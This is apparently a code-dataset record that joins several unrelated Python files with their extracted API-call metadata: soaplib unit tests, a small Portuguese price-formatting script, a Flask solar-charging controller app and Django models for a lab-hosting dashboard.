self.assertEquals('funkytown', peep.addresses[18].city)
def test_complex_class(self):
l = Level1()
l.level2 = Level2()
l.level2.arg1 = 'abcd'
l.level2.arg2 = 1.444
l.level3 = []
l.level4 = []
for i in range(0, 100):
a = Level3()
a.arg1 = i
l.level3.append(a)
for i in range(0, 4):
a = Level4()
a.arg1 = str(i)
l.level4.append(a)
element = etree.Element('test')
Level1.to_parent_element(l, ns_test, element)
element = element[0]
l1 = Level1.from_xml(element)
self.assertEquals(l1.level2.arg1, l.level2.arg1)
self.assertEquals(l1.level2.arg2, l.level2.arg2)
self.assertEquals(len(l1.level4), len(l.level4))
self.assertEquals(100, len(l.level3))
def test_customize(self):
class Base(ClassModel):
class Attributes(ClassModel.Attributes):
prop1=3
prop2=6
Base2 = Base.customize(prop1=4)
self.assertNotEquals(Base.Attributes.prop1, Base2.Attributes.prop1)
self.assertEquals(Base.Attributes.prop2, Base2.Attributes.prop2)
class Derived(Base):
class Attributes(Base.Attributes):
prop3 = 9
prop4 = 12
Derived2 = Derived.customize(prop1=5, prop3=12)
self.assertEquals(Base.Attributes.prop1, 3)
self.assertEquals(Base2.Attributes.prop1, 4)
self.assertEquals(Derived.Attributes.prop1, 3)
self.assertEquals(Derived2.Attributes.prop1, 5)
self.assertNotEquals(Derived.Attributes.prop3, Derived2.Attributes.prop3)
self.assertEquals(Derived.Attributes.prop4, Derived2.Attributes.prop4)
Derived3 = Derived.customize(prop3=12)
Base.prop1 = 4
# changes made to bases propagate, unless overridden
self.assertEquals(Derived.Attributes.prop1, Base.Attributes.prop1)
self.assertNotEquals(Derived2.Attributes.prop1, Base.Attributes.prop1)
self.assertEquals(Derived3.Attributes.prop1, Base.Attributes.prop1)
def test_from_string(self):
from soaplib.core.util.model_utils import ClassModelConverter
class Simple(ClassModel):
number = Integer
text = String
class NotSoSimple(ClassModel):
number_1 = Integer
number_2 = Integer
body = Simple
nss = NotSoSimple()
nss.number_1 = 100
nss.number_2 = 1000
nss.body = Simple()
nss.body.number = 1
nss.body.text = "Some Text"
cmc = ClassModelConverter(nss, "testfromstring", include_ns=False)
element = cmc.to_etree()
assert nss.body.number == 1
assert nss.number_1 == 100
nss_from_xml = NotSoSimple.from_string(cmc.to_xml())
assert nss_from_xml.body.number == 1
assert nss_from_xml.body.text == "Some Text"
assert nss_from_xml.number_1 == 100
assert nss_from_xml.number_2 == 1000
if __name__ == '__main__':
unittest.main()
| [
"lxml.etree.Element",
"soaplib.core.model.clazz.Array",
"datetime.datetime",
"soaplib.core.model.primitive.Integer",
"soaplib.core.model.primitive.Float",
"unittest.main",
"soaplib.core.util.model_utils.ClassModelConverter",
"soaplib.core.model.primitive.String",
"soaplib.core.model.primitive.DateTi... | [((1212, 1232), 'soaplib.core.model.primitive.String', 'String', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1218, 1232), False, 'from soaplib.core.model.primitive import String\n'), ((1244, 1264), 'soaplib.core.model.primitive.String', 'String', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1250, 1264), False, 'from soaplib.core.model.primitive import String\n'), ((1275, 1296), 'soaplib.core.model.primitive.Integer', 'Integer', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1282, 1296), False, 'from soaplib.core.model.primitive import Integer\n'), ((1309, 1331), 'soaplib.core.model.primitive.DateTime', 'DateTime', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1317, 1331), False, 'from soaplib.core.model.primitive import DateTime\n'), ((1348, 1367), 'soaplib.core.model.primitive.Float', 'Float', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1353, 1367), False, 'from soaplib.core.model.primitive import Float\n'), ((1384, 1403), 'soaplib.core.model.primitive.Float', 'Float', ([], {'min_occurs': '(1)'}), '(min_occurs=1)\n', (1389, 1403), False, 'from soaplib.core.model.primitive import Float\n'), ((1553, 1567), 'soaplib.core.model.clazz.Array', 'Array', (['Address'], {}), '(Address)\n', (1558, 1567), False, 'from soaplib.core.model.clazz import Array\n'), ((1581, 1594), 'soaplib.core.model.clazz.Array', 'Array', (['String'], {}), '(String)\n', (1586, 1594), False, 'from soaplib.core.model.clazz import Array\n'), ((2100, 2113), 'soaplib.core.model.clazz.Array', 'Array', (['Level3'], {}), '(Level3)\n', (2105, 2113), False, 'from soaplib.core.model.clazz import Array\n'), ((2127, 2140), 'soaplib.core.model.clazz.Array', 'Array', (['Level4'], {}), '(Level4)\n', (2132, 2140), False, 'from soaplib.core.model.clazz import Array\n'), ((8144, 8159), 'unittest.main', 'unittest.main', ([], {}), '()\n', (8157, 8159), False, 'import unittest\n'), ((2436, 2457), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], 
{}), "('test')\n", (2449, 2457), False, 'from lxml import etree\n'), ((3021, 3042), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (3034, 3042), False, 'from lxml import etree\n'), ((3607, 3620), 'soaplib.core.model.clazz.Array', 'Array', (['Person'], {}), '(Person)\n', (3612, 3620), False, 'from soaplib.core.model.clazz import Array\n'), ((3686, 3707), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (3699, 3707), False, 'from lxml import etree\n'), ((4619, 4632), 'soaplib.core.model.clazz.Array', 'Array', (['Person'], {}), '(Person)\n', (4624, 4632), False, 'from soaplib.core.model.clazz import Array\n'), ((4697, 4718), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (4710, 4718), False, 'from lxml import etree\n'), ((5533, 5554), 'lxml.etree.Element', 'etree.Element', (['"""test"""'], {}), "('test')\n", (5546, 5554), False, 'from lxml import etree\n'), ((7695, 7755), 'soaplib.core.util.model_utils.ClassModelConverter', 'ClassModelConverter', (['nss', '"""testfromstring"""'], {'include_ns': '(False)'}), "(nss, 'testfromstring', include_ns=False)\n", (7714, 7755), False, 'from soaplib.core.util.model_utils import ClassModelConverter\n'), ((3510, 3539), 'datetime.datetime', 'datetime.datetime', (['(1979)', '(1)', '(1)'], {}), '(1979, 1, 1)\n', (3527, 3539), False, 'import datetime\n'), ((4298, 4327), 'datetime.datetime', 'datetime.datetime', (['(1979)', '(1)', '(1)'], {}), '(1979, 1, 1)\n', (4315, 4327), False, 'import datetime\n'), ((4045, 4074), 'datetime.datetime', 'datetime.datetime', (['(1979)', '(1)', '(1)'], {}), '(1979, 1, 1)\n', (4062, 4074), False, 'import datetime\n')] |
import moeda
preco = float(input("Digite o preço: R$"))
por100 = float(input("Digite a porcentagem: "))
formatar = str(input("Deseja formatar como moeda [S/N]? ")).upper()
if "S" in formatar:
formatado = True
else:
formatado = False
print(f"\nA metade de {moeda.moeda(preco)} é {moeda.metade(preco, formatado)}")
print(f"O dobro de {moeda.moeda(preco)} é {moeda.dobro(preco, formatado)}")
print(f"Aumentando {por100}% de {moeda.moeda(preco)}, temos {moeda.aumentar(preco, por100, formatado)}")
print(f"Diminuindo {por100}% de {moeda.moeda(preco)}, temos {moeda.diminuir(preco, por100, formatado)}")
| [
"moeda.moeda",
"moeda.dobro",
"moeda.diminuir",
"moeda.aumentar",
"moeda.metade"
] | [((267, 285), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (278, 285), False, 'import moeda\n'), ((291, 321), 'moeda.metade', 'moeda.metade', (['preco', 'formatado'], {}), '(preco, formatado)\n', (303, 321), False, 'import moeda\n'), ((344, 362), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (355, 362), False, 'import moeda\n'), ((368, 397), 'moeda.dobro', 'moeda.dobro', (['preco', 'formatado'], {}), '(preco, formatado)\n', (379, 397), False, 'import moeda\n'), ((433, 451), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (444, 451), False, 'import moeda\n'), ((461, 501), 'moeda.aumentar', 'moeda.aumentar', (['preco', 'por100', 'formatado'], {}), '(preco, por100, formatado)\n', (475, 501), False, 'import moeda\n'), ((538, 556), 'moeda.moeda', 'moeda.moeda', (['preco'], {}), '(preco)\n', (549, 556), False, 'import moeda\n'), ((566, 606), 'moeda.diminuir', 'moeda.diminuir', (['preco', 'por100', 'formatado'], {}), '(preco, por100, formatado)\n', (580, 606), False, 'import moeda\n')] |
import logging
# configure logging before initializing further modules
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s [%(levelname)s] %(name)s - %(message)s")
logging.getLogger("urllib3.connectionpool").setLevel(logging.INFO)
import argparse
import json
import flask
import flask_compress
from werkzeug.middleware.dispatcher import DispatcherMiddleware
import prometheus_client
from pvcontrol import views, relay
from pvcontrol.meter import MeterFactory
from pvcontrol.chargecontroller import ChargeControllerFactory
from pvcontrol.wallbox import WallboxFactory
from pvcontrol.car import CarFactory
from pvcontrol.scheduler import Scheduler
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description="PV Control")
parser.add_argument("-m", "--meter", default="SimulatedMeter")
parser.add_argument("-w", "--wallbox", default="SimulatedWallbox")
parser.add_argument("-a", "--car", default="SimulatedCar")
parser.add_argument("-c", "--config", default="{}")
args = parser.parse_args()
logger.info("Starting pvcontrol")
logger.info(f"Meter: {args.meter}")
logger.info(f"Wallbox: {args.wallbox}")
logger.info(f"Car: {args.car}")
logger.info(f"config: {args.config}")
config = json.loads(args.config)
for c in ["wallbox", "meter", "car", "controller"]:
if c not in config:
config[c] = {}
wallbox = WallboxFactory.newWallbox(args.wallbox, **config["wallbox"])
meter = MeterFactory.newMeter(args.meter, wallbox, **config["meter"])
car = CarFactory.newCar(args.car, **config["car"])
controller = ChargeControllerFactory.newController(meter, wallbox, **config["controller"])
controller_scheduler = Scheduler(controller.get_config().cycle_time, controller.run)
controller_scheduler.start()
car_scheduler = Scheduler(car.get_config().cycle_time, car.read_data)
car_scheduler.start()
app = flask.Flask(__name__)
app.json_encoder = views.JSONEncoder
app.after_request(views.add_no_cache_header)
app.config["COMPRESS_MIN_SIZE"] = 2048
app.config["COMPRESS_MIMETYPES"] = ["text/html", "text/css", "application/json", "application/javascript", "image/vnd.microsoft.icon"]
compress = flask_compress.Compress()
compress.init_app(app)
app.add_url_rule("/", view_func=views.StaticResourcesView.as_view("get_index"), defaults={"path": "index.html"})
app.add_url_rule("/<path:path>", view_func=views.StaticResourcesView.as_view("get_static"))
app.add_url_rule("/api/pvcontrol", view_func=views.PvControlView.as_view("get_pvcontrol", meter, wallbox, controller, car))
app.add_url_rule("/api/pvcontrol/controller", view_func=views.PvControlConfigDataView.as_view("get_controller", controller))
app.add_url_rule("/api/pvcontrol/controller/desired_mode", view_func=views.PvControlChargeModeView.as_view("put_desired_mode", controller))
app.add_url_rule("/api/pvcontrol/controller/phase_mode", view_func=views.PvControlPhaseModeView.as_view("put_phase_mode", controller))
app.add_url_rule("/api/pvcontrol/meter", view_func=views.PvControlConfigDataView.as_view("get_meter", meter))
app.add_url_rule("/api/pvcontrol/wallbox", view_func=views.PvControlConfigDataView.as_view("get_wallbox", wallbox))
app.add_url_rule("/api/pvcontrol/car", view_func=views.PvControlConfigDataView.as_view("get_car", car))
# for testing only
app.add_url_rule("/api/pvcontrol/wallbox/car_status", view_func=views.PvControlCarStatusView.as_view("put_car_status", wallbox))
# Add prometheus wsgi middleware to route /metrics requests
app.wsgi_app = DispatcherMiddleware(app.wsgi_app, {"/metrics": prometheus_client.make_wsgi_app()})
app.run(host="0.0.0.0", port=8080)
controller_scheduler.stop()
car_scheduler.stop()
# disable charging to play it safe
# TODO: see ChargeMode.INIT handling
logger.info("Set wallbox.allow_charging=False on shutdown.")
wallbox.allow_charging(False)
relay.cleanup()
logger.info("Stopped pvcontrol")
| [
"logging.basicConfig",
"logging.getLogger",
"json.loads",
"pvcontrol.meter.MeterFactory.newMeter",
"argparse.ArgumentParser",
"pvcontrol.car.CarFactory.newCar",
"pvcontrol.chargecontroller.ChargeControllerFactory.newController",
"flask.Flask",
"pvcontrol.views.PvControlCarStatusView.as_view",
"pvc... | [((72, 178), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG', 'format': '"""%(asctime)s [%(levelname)s] %(name)s - %(message)s"""'}), "(level=logging.DEBUG, format=\n '%(asctime)s [%(levelname)s] %(name)s - %(message)s')\n", (91, 178), False, 'import logging\n'), ((668, 695), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (685, 695), False, 'import logging\n'), ((706, 755), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PV Control"""'}), "(description='PV Control')\n", (729, 755), False, 'import argparse\n'), ((1221, 1244), 'json.loads', 'json.loads', (['args.config'], {}), '(args.config)\n', (1231, 1244), False, 'import json\n'), ((1355, 1415), 'pvcontrol.wallbox.WallboxFactory.newWallbox', 'WallboxFactory.newWallbox', (['args.wallbox'], {}), "(args.wallbox, **config['wallbox'])\n", (1380, 1415), False, 'from pvcontrol.wallbox import WallboxFactory\n'), ((1424, 1485), 'pvcontrol.meter.MeterFactory.newMeter', 'MeterFactory.newMeter', (['args.meter', 'wallbox'], {}), "(args.meter, wallbox, **config['meter'])\n", (1445, 1485), False, 'from pvcontrol.meter import MeterFactory\n'), ((1492, 1536), 'pvcontrol.car.CarFactory.newCar', 'CarFactory.newCar', (['args.car'], {}), "(args.car, **config['car'])\n", (1509, 1536), False, 'from pvcontrol.car import CarFactory\n'), ((1550, 1627), 'pvcontrol.chargecontroller.ChargeControllerFactory.newController', 'ChargeControllerFactory.newController', (['meter', 'wallbox'], {}), "(meter, wallbox, **config['controller'])\n", (1587, 1627), False, 'from pvcontrol.chargecontroller import ChargeControllerFactory\n'), ((1842, 1863), 'flask.Flask', 'flask.Flask', (['__name__'], {}), '(__name__)\n', (1853, 1863), False, 'import flask\n'), ((2131, 2156), 'flask_compress.Compress', 'flask_compress.Compress', ([], {}), '()\n', (2154, 2156), False, 'import flask_compress\n'), ((3797, 3812), 'pvcontrol.relay.cleanup', 'relay.cleanup', ([], {}), 
'()\n', (3810, 3812), False, 'from pvcontrol import views, relay\n'), ((174, 217), 'logging.getLogger', 'logging.getLogger', (['"""urllib3.connectionpool"""'], {}), "('urllib3.connectionpool')\n", (191, 217), False, 'import logging\n'), ((2213, 2259), 'pvcontrol.views.StaticResourcesView.as_view', 'views.StaticResourcesView.as_view', (['"""get_index"""'], {}), "('get_index')\n", (2246, 2259), False, 'from pvcontrol import views, relay\n'), ((2337, 2384), 'pvcontrol.views.StaticResourcesView.as_view', 'views.StaticResourcesView.as_view', (['"""get_static"""'], {}), "('get_static')\n", (2370, 2384), False, 'from pvcontrol import views, relay\n'), ((2431, 2508), 'pvcontrol.views.PvControlView.as_view', 'views.PvControlView.as_view', (['"""get_pvcontrol"""', 'meter', 'wallbox', 'controller', 'car'], {}), "('get_pvcontrol', meter, wallbox, controller, car)\n", (2458, 2508), False, 'from pvcontrol import views, relay\n'), ((2566, 2633), 'pvcontrol.views.PvControlConfigDataView.as_view', 'views.PvControlConfigDataView.as_view', (['"""get_controller"""', 'controller'], {}), "('get_controller', controller)\n", (2603, 2633), False, 'from pvcontrol import views, relay\n'), ((2704, 2773), 'pvcontrol.views.PvControlChargeModeView.as_view', 'views.PvControlChargeModeView.as_view', (['"""put_desired_mode"""', 'controller'], {}), "('put_desired_mode', controller)\n", (2741, 2773), False, 'from pvcontrol import views, relay\n'), ((2842, 2908), 'pvcontrol.views.PvControlPhaseModeView.as_view', 'views.PvControlPhaseModeView.as_view', (['"""put_phase_mode"""', 'controller'], {}), "('put_phase_mode', controller)\n", (2878, 2908), False, 'from pvcontrol import views, relay\n'), ((2961, 3018), 'pvcontrol.views.PvControlConfigDataView.as_view', 'views.PvControlConfigDataView.as_view', (['"""get_meter"""', 'meter'], {}), "('get_meter', meter)\n", (2998, 3018), False, 'from pvcontrol import views, relay\n'), ((3073, 3134), 'pvcontrol.views.PvControlConfigDataView.as_view', 
'views.PvControlConfigDataView.as_view', (['"""get_wallbox"""', 'wallbox'], {}), "('get_wallbox', wallbox)\n", (3110, 3134), False, 'from pvcontrol import views, relay\n'), ((3185, 3238), 'pvcontrol.views.PvControlConfigDataView.as_view', 'views.PvControlConfigDataView.as_view', (['"""get_car"""', 'car'], {}), "('get_car', car)\n", (3222, 3238), False, 'from pvcontrol import views, relay\n'), ((3323, 3386), 'pvcontrol.views.PvControlCarStatusView.as_view', 'views.PvControlCarStatusView.as_view', (['"""put_car_status"""', 'wallbox'], {}), "('put_car_status', wallbox)\n", (3359, 3386), False, 'from pvcontrol import views, relay\n'), ((3513, 3546), 'prometheus_client.make_wsgi_app', 'prometheus_client.make_wsgi_app', ([], {}), '()\n', (3544, 3546), False, 'import prometheus_client\n')] |
##############################################################################
# Copyright (c) 2016 <NAME> and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
from django.contrib.auth.models import User
from django.db import models
from django.apps import apps
import json
import random
from collections import Counter
from dashboard.exceptions import ResourceAvailabilityException
class LabStatus(object):
"""
A Poor man's enum for the status of a lab.
If everything is working fine at a lab, it is UP.
If it is down temporarily e.g. for maintenance, it is TEMP_DOWN
If its broken, its DOWN
"""
UP = 0
TEMP_DOWN = 100
DOWN = 200
def upload_to(object, filename):
return object.user.username + '/' + filename
class UserProfile(models.Model):
"""Extend the Django User model."""
user = models.OneToOneField(User, on_delete=models.CASCADE)
timezone = models.CharField(max_length=100, blank=False, default='UTC')
ssh_public_key = models.FileField(upload_to=upload_to, null=True, blank=True)
pgp_public_key = models.FileField(upload_to=upload_to, null=True, blank=True)
email_addr = models.CharField(max_length=300, blank=False, default='<EMAIL>')
company = models.CharField(max_length=200, blank=False)
oauth_token = models.CharField(max_length=1024, blank=False)
oauth_secret = models.CharField(max_length=1024, blank=False)
jira_url = models.CharField(max_length=100, null=True, blank=True, default='')
full_name = models.CharField(max_length=100, null=True, blank=True, default='')
booking_privledge = models.BooleanField(default=False)
public_user = models.BooleanField(default=False)
class Meta:
db_table = 'user_profile'
def __str__(self):
return self.user.username
class VlanManager(models.Model):
"""
Keeps track of the vlans for a lab.
Vlans are represented as indexes into a 4096 element list.
This list is serialized to JSON for storing in the DB.
"""
# list of length 4096 containing either 0 (not available) or 1 (available)
vlans = models.TextField()
# list of length 4096 containing either 0 (not reserved) or 1 (reserved)
reserved_vlans = models.TextField()
block_size = models.IntegerField()
# True if the lab allows two different users to have the same private vlans
# if they use QinQ or a vxlan overlay, for example
allow_overlapping = models.BooleanField()
def get_vlans(self, count=1):
"""
Return the IDs of available vlans as a list[int], but does not reserve them.
Will throw index exception if not enough vlans are available.
Always returns a list of ints
"""
allocated = []
vlans = json.loads(self.vlans)
reserved = json.loads(self.reserved_vlans)
for i in range(0, len(vlans) - 1):
if len(allocated) >= count:
break
if vlans[i] == 0 and self.allow_overlapping is False:
continue
if reserved[i] == 1:
continue
# vlan is available and not reserved, so safe to add
allocated.append(i)
continue
if len(allocated) != count:
raise ResourceAvailabilityException("can't allocate the vlans requested")
return allocated
def get_public_vlan(self):
"""Return reference to an available public network without reserving it."""
return PublicNetwork.objects.filter(lab=self.lab_set.first(), in_use=False).first()
def reserve_public_vlan(self, vlan):
"""Reserves the Public Network that has the given vlan."""
net = PublicNetwork.objects.get(lab=self.lab_set.first(), vlan=vlan, in_use=False)
net.in_use = True
net.save()
def release_public_vlan(self, vlan):
"""Un-reserves a public network with the given vlan."""
net = PublicNetwork.objects.get(lab=self.lab_set.first(), vlan=vlan, in_use=True)
net.in_use = False
net.save()
def public_vlan_is_available(self, vlan):
"""
Whether the public vlan is available.
returns true if the network with the given vlan is free to use,
False otherwise
"""
net = PublicNetwork.objects.get(lab=self.lab_set.first(), vlan=vlan)
return not net.in_use
def is_available(self, vlans):
"""
If the vlans are available.
'vlans' is either a single vlan id integer or a list of integers
will return true (available) or false
"""
if self.allow_overlapping:
return True
reserved = json.loads(self.reserved_vlans)
vlan_master_list = json.loads(self.vlans)
try:
iter(vlans)
except Exception:
vlans = [vlans]
for vlan in vlans:
if not vlan_master_list[vlan] or reserved[vlan]:
return False
return True
def release_vlans(self, vlans):
"""
Make the vlans available for another booking.
'vlans' is either a single vlan id integer or a list of integers
will make the vlans available
doesnt return a value
"""
my_vlans = json.loads(self.vlans)
try:
iter(vlans)
except Exception:
vlans = [vlans]
for vlan in vlans:
my_vlans[vlan] = 1
self.vlans = json.dumps(my_vlans)
self.save()
def reserve_vlans(self, vlans):
"""
Reserves all given vlans or throws a ValueError.
vlans can be an integer or a list of integers.
"""
my_vlans = json.loads(self.vlans)
reserved = json.loads(self.reserved_vlans)
try:
iter(vlans)
except Exception:
vlans = [vlans]
vlans = set(vlans)
for vlan in vlans:
if my_vlans[vlan] == 0 or reserved[vlan] == 1:
raise ValueError("vlan " + str(vlan) + " is not available")
my_vlans[vlan] = 0
self.vlans = json.dumps(my_vlans)
self.save()
class Lab(models.Model):
"""
Model representing a Hosting Lab.
Anybody that wants to host resources for LaaS needs to have a Lab model
We associate hardware with Labs so we know what is available and where.
"""
lab_user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=200, primary_key=True, unique=True, null=False, blank=False)
contact_email = models.EmailField(max_length=200, null=True, blank=True)
contact_phone = models.CharField(max_length=20, null=True, blank=True)
status = models.IntegerField(default=LabStatus.UP)
vlan_manager = models.ForeignKey(VlanManager, on_delete=models.CASCADE, null=True)
location = models.TextField(default="unknown")
# This token must apear in API requests from this lab
api_token = models.CharField(max_length=50)
description = models.CharField(max_length=240)
lab_info_link = models.URLField(null=True)
project = models.CharField(default='LaaS', max_length=100)
@staticmethod
def make_api_token():
"""Generate random 45 character string for API token."""
alphabet = "<KEY>"
key = ""
for i in range(45):
key += random.choice(alphabet)
return key
def get_available_resources(self):
# Cannot import model normally due to ciruclar import
Server = apps.get_model('resource_inventory', 'Server') # TODO: Find way to import ResourceQuery
resources = [str(resource.profile) for resource in Server.objects.filter(lab=self, working=True, booked=False)]
return dict(Counter(resources))
def __str__(self):
return self.name
class PublicNetwork(models.Model):
"""L2/L3 network that can reach the internet."""
vlan = models.IntegerField()
lab = models.ForeignKey(Lab, on_delete=models.CASCADE)
in_use = models.BooleanField(default=False)
cidr = models.CharField(max_length=50, default="0.0.0.0/0")
gateway = models.CharField(max_length=50, default="0.0.0.0")
class Downtime(models.Model):
    """
    A Downtime event.

    Labs can create Downtime objects so the dashboard can
    alert users that the lab is down, etc
    """

    start = models.DateTimeField()
    end = models.DateTimeField()
    lab = models.ForeignKey(Lab, on_delete=models.CASCADE)
    description = models.TextField(default="This lab will be down for maintenance")

    def save(self, *args, **kwargs):
        """Validate the downtime window before persisting it.

        Raises:
            ValueError: if the window is inverted, or if it overlaps an
                existing downtime for the same lab.
        """
        if self.start >= self.end:
            raise ValueError('Start date is after end date')

        # Two intervals overlap iff each one starts before the other ends.
        # The original pair of checks (existing start inside the new window,
        # or existing end inside it) missed the case where an existing
        # downtime completely contains the new one.
        overlapping = Downtime.objects.filter(
            lab=self.lab,
            start__lt=self.end,
            end__gt=self.start,
        ).exclude(pk=self.pk)  # don't compare a row against itself on re-save
        if overlapping.exists():
            raise ValueError('Overlapping Downtime')

        return super(Downtime, self).save(*args, **kwargs)
| [
"django.db.models.OneToOneField",
"django.db.models.EmailField",
"json.loads",
"random.choice",
"django.db.models.TextField",
"django.db.models.IntegerField",
"django.db.models.ForeignKey",
"json.dumps",
"django.db.models.FileField",
"django.db.models.DateTimeField",
"django.db.models.BooleanFie... | [((1129, 1181), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (1149, 1181), False, 'from django.db import models\n'), ((1197, 1257), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'blank': '(False)', 'default': '"""UTC"""'}), "(max_length=100, blank=False, default='UTC')\n", (1213, 1257), False, 'from django.db import models\n'), ((1279, 1339), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': 'upload_to', 'null': '(True)', 'blank': '(True)'}), '(upload_to=upload_to, null=True, blank=True)\n', (1295, 1339), False, 'from django.db import models\n'), ((1361, 1421), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': 'upload_to', 'null': '(True)', 'blank': '(True)'}), '(upload_to=upload_to, null=True, blank=True)\n', (1377, 1421), False, 'from django.db import models\n'), ((1439, 1503), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(300)', 'blank': '(False)', 'default': '"""<EMAIL>"""'}), "(max_length=300, blank=False, default='<EMAIL>')\n", (1455, 1503), False, 'from django.db import models\n'), ((1518, 1563), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'blank': '(False)'}), '(max_length=200, blank=False)\n', (1534, 1563), False, 'from django.db import models\n'), ((1583, 1629), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'blank': '(False)'}), '(max_length=1024, blank=False)\n', (1599, 1629), False, 'from django.db import models\n'), ((1649, 1695), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'blank': '(False)'}), '(max_length=1024, blank=False)\n', (1665, 1695), False, 'from django.db import models\n'), ((1712, 1779), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'default': 
'""""""'}), "(max_length=100, null=True, blank=True, default='')\n", (1728, 1779), False, 'from django.db import models\n'), ((1797, 1864), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'default': '""""""'}), "(max_length=100, null=True, blank=True, default='')\n", (1813, 1864), False, 'from django.db import models\n'), ((1889, 1923), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1908, 1923), False, 'from django.db import models\n'), ((1943, 1977), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1962, 1977), False, 'from django.db import models\n'), ((2393, 2411), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2409, 2411), False, 'from django.db import models\n'), ((2510, 2528), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2526, 2528), False, 'from django.db import models\n'), ((2547, 2568), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2566, 2568), False, 'from django.db import models\n'), ((2729, 2750), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (2748, 2750), False, 'from django.db import models\n'), ((6671, 6723), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (6691, 6723), False, 'from django.db import models\n'), ((6735, 6827), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'primary_key': '(True)', 'unique': '(True)', 'null': '(False)', 'blank': '(False)'}), '(max_length=200, primary_key=True, unique=True, null=False,\n blank=False)\n', (6751, 6827), False, 'from django.db import models\n'), ((6844, 6900), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(200)', 'null': '(True)', 'blank': '(True)'}), '(max_length=200, 
null=True, blank=True)\n', (6861, 6900), False, 'from django.db import models\n'), ((6921, 6975), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(20)', 'null': '(True)', 'blank': '(True)'}), '(max_length=20, null=True, blank=True)\n', (6937, 6975), False, 'from django.db import models\n'), ((6989, 7030), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': 'LabStatus.UP'}), '(default=LabStatus.UP)\n', (7008, 7030), False, 'from django.db import models\n'), ((7050, 7117), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VlanManager'], {'on_delete': 'models.CASCADE', 'null': '(True)'}), '(VlanManager, on_delete=models.CASCADE, null=True)\n', (7067, 7117), False, 'from django.db import models\n'), ((7133, 7168), 'django.db.models.TextField', 'models.TextField', ([], {'default': '"""unknown"""'}), "(default='unknown')\n", (7149, 7168), False, 'from django.db import models\n'), ((7243, 7274), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (7259, 7274), False, 'from django.db import models\n'), ((7293, 7325), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(240)'}), '(max_length=240)\n', (7309, 7325), False, 'from django.db import models\n'), ((7346, 7372), 'django.db.models.URLField', 'models.URLField', ([], {'null': '(True)'}), '(null=True)\n', (7361, 7372), False, 'from django.db import models\n'), ((7387, 7435), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""LaaS"""', 'max_length': '(100)'}), "(default='LaaS', max_length=100)\n", (7403, 7435), False, 'from django.db import models\n'), ((8199, 8220), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (8218, 8220), False, 'from django.db import models\n'), ((8231, 8279), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Lab'], {'on_delete': 'models.CASCADE'}), '(Lab, on_delete=models.CASCADE)\n', (8248, 8279), False, 'from django.db import 
